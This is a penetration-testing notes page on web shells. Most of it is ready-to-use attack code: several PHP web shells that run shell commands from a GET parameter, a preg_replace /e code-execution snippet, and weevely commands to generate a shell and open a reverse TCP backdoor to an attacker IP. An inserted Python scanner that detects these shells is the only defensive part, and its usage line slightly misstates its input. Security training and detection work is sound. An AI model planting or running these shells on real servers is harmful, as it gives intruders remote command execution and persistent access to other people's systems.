Web shell

A web shell is a shell that is usually accessed from a browser. When possible, we want to use it as a foothold to move to a reverse shell.

The language used in the web shell is determined by the language the target web server understands, such as PHP, JavaScript, or .NET. ✨

For JavaScript, you need to find a way for the website to execute your web shell. For PHP, visit the web shell URL.

⚠️ Password-protect your web shells during assignments and/or randomize the parameter name (e.g., don't use cmd).

On Kali, you can use the preinstalled web shells in wordlists, or install and use SecLists webshells.

$ ls /usr/share/webshells
$ ls /usr/share/seclists/Web-Shells/
$ ls /usr/share/laudanum/ # edit and add the client (you?) IP

You may use the web shell to pop a reverse shell. Some payloads may not work smoothly depending on the target configuration. Try:

bash -c "<reverse shell payload here>"

PHP web shell

PHP web shells are PHP files such as webshell.php. Once uploaded to the target, you execute them by opening them in a browser.

Most web shells below take the command to run from a GET parameter. For instance, [...]/webshell.php?cmd=id runs the id command.

Most web shells below are more elaborate so they handle redirections, multi-line output, a default command, etc. You can always get by with a minimal payload such as <?=system($_GET[0]??true);?> and call it with ?0=whoami.


PHP — shell_exec

This is a compact web shell using shell_exec (doc).

<?="<pre>".shell_exec(($_GET['cmd'] ?? "whoami")." 2>&1")."</pre>"; ?>

You may replace <?= with <?php echo if the short echo tag is not supported.


PHP — weevely3

This is a web shell using weevely3 (3.2k ⭐).

# generate a webshell.php protected by "password"
$ weevely generate <password> webshell.php
# connect to the web shell
$ weevely URL/webshell.php <password>
# see help (inside the weevely terminal)
$ :help
# ex: create a reverse shell
$ :backdoor_reversetcp IP PORT

PHP — phpbash

You can use the semi-interactive phpbash (0.9k ⭐, 2018 🪦).


PHP — wwwolf

You can use the semi-interactive wwwolf web shell (0.6k ⭐, 2017 🪦).


PHP — p0wny

You can use the semi-interactive p0wny web shell (2.1k ⭐).

PHP — preg_replace

In PHP < 7.0.0, the /e modifier of preg_replace evaluated the replacement string as PHP code for each match found (deprecated with a warning since PHP 5.5).

<?php
// the /e modifier runs the replacement as PHP code for each match (PHP < 7.0.0 only)
echo preg_replace('/a/e', 'system("whoami");', 'a');

PHP — exec

This is a web shell using exec (doc).

<?php
$output = "";
exec(($_GET["cmd"] ?? "whoami")." 2>&1", $output);
echo "<pre>".implode('<br>', $output)."</pre>";
?>

PHP — passthru

This is a web shell using passthru (doc).

<?php
echo "<pre>";
// passthru() writes the raw command output directly to the response; it returns nothing worth echoing
passthru(($_GET["cmd"] ?? "whoami")." 2>&1");
echo "</pre>";
?>

PHP — system

This is a web shell using system (doc).

<?php
echo "<pre>";
// system() prints the output itself and returns only the last line, so echoing it would repeat that line
system(($_GET["cmd"] ?? "whoami")." 2>&1");
echo "</pre>";
?>

PHP — LD_PRELOAD

Refer to PHP mail() and putenv() bypass.
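From the defender's side, the PHP shells above share two signatures: a command-execution sink (shell_exec, exec, passthru, system) fed straight from a request superglobal, and preg_replace with the /e modifier. As an added example that is not part of the original page, this small Python scanner flags uploaded PHP files showing either pattern; the sample files are constructed inline and the function names are my own.

```python
import re

# Constructed samples (not real uploads): minimal variants of the GET-driven
# PHP web shells shown above, plus one benign form handler.
SAMPLES = {
    "shell_exec.php": '<?="<pre>".shell_exec(($_GET[\'cmd\'] ?? "whoami")." 2>&1")."</pre>"; ?>',
    "minimal.php": "<?=system($_GET[0]??true);?>",
    "exec.php": '<?php\n$o = [];\nexec(($_GET["cmd"] ?? "whoami")." 2>&1", $o);\n?>',
    "preg_e.php": "<?php\necho preg_replace('/a/e', 'system(\"whoami\");', 'a');",
    "contact.php": '<?php\n$name = htmlspecialchars($_POST["name"] ?? "");\necho "Hi $name";',
}

# Command-execution sinks used by the shells on this page.
SINKS = ("shell_exec", "exec", "passthru", "system", "popen", "proc_open")
SINK_CALL = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(")
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# Quoted regex literal passed to preg_replace: quote, delimiter, body, delimiter, modifiers, quote.
PREG_LITERAL = re.compile(r"preg_replace\s*\(\s*(['\"])(.)(.*?)\2([a-zA-Z]*)\1")


def _call_args(src: str, open_idx: int):
    """Return the argument text of the call whose '(' is at open_idx,
    honouring nested parentheses (string literals are not parsed)."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return None  # unbalanced call, ignore


def find_webshell_indicators(src: str) -> list:
    """List the reasons a PHP source looks like one of the web shells above."""
    hits = []
    for m in SINK_CALL.finditer(src):
        args = _call_args(src, m.end() - 1)
        if args is not None and REQUEST_INPUT.search(args):
            hits.append(f"{m.group(1)}() fed from request input")
    for m in PREG_LITERAL.finditer(src):
        if "e" in m.group(4):
            hits.append("preg_replace() with /e modifier (code execution on PHP < 7)")
    return hits


def scan_files(files: dict) -> dict:
    """Map file name -> indicators, for flagged files only."""
    return {name: h for name, src in files.items() if (h := find_webshell_indicators(src))}
```

Run scan_files(SAMPLES) over a directory of uploads to get a flagged-file report; the paren matcher ignores string literals, so treat hits as triage leads rather than proof.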


C#

C# — Antak

You can find antak.aspx here (8.7k ⭐).


👻 To-do 👻

Stuff that I found but have not read or used yet.